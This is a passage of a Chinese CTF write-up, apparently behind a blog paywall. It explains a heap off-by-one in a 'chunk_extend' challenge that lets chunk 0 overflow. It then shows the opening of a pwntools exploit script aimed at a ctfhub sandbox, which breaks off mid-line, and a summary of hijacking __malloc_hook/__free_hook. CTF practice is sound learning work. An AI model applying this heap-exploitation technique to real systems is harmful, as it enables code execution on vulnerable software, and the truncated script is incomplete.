漏洞点

add这里如果 index 0 ~ 9 都申请了的 chunk ,那么 i = 10 再退出 for 循环,但是还会接下去利用 ptr[10] = malloc(ptr[20]) 申请chunk,实现 index 0 的堆块溢出
也就是add 可以覆盖掉一个第一个 chunk 的 size
最后第11个chunk的size会变成非常大,编辑chunk0,就可以实现溢出
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./chunk_extend"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",30492)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096

该文章详细描述了一个利用堆溢出漏洞来操控内存的场景。通过在CTF挑战中远程连接到一个服务,作者演示了如何通过添加和释放特定大小的chunk,然后编辑堆块大小和内容,导致index0的堆块溢出,进而修改其他chunk的size。最终,通过操纵`__malloc_hook`和`__free_hook`,实现了代码执行,展示了底层内存管理的安全风险和技术利用方法。
最低0.47元/天 解锁文章

372

被折叠的 条评论
为什么被折叠?



